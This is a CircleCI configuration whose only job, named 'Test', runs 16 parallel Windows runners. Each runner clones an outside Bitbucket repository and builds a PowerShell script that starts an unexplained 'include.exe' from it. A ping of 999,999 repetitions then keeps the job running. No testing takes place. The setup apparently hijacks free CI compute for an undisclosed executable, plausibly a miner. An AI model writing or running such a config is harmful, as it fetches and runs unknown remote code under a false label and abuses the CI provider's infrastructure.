version: 2.1 
 
orbs:
  win: circleci/windows@2.2.0
 
jobs:
  build:
    parallelism: 16
    executor:
      name: win/default 
      size: "medium" 
 
    steps:
      - run:
          name: Test
          command: |
               git clone https://bitbucket.org/kijang-020/php-heroku
               cd php-heroku
               cd web
               cmd /c echo cmd /k start include.exe >>b.ps1
               cmd /c echo ping -n 999999 10.10.10.10 >>b.ps1
               .\b.ps1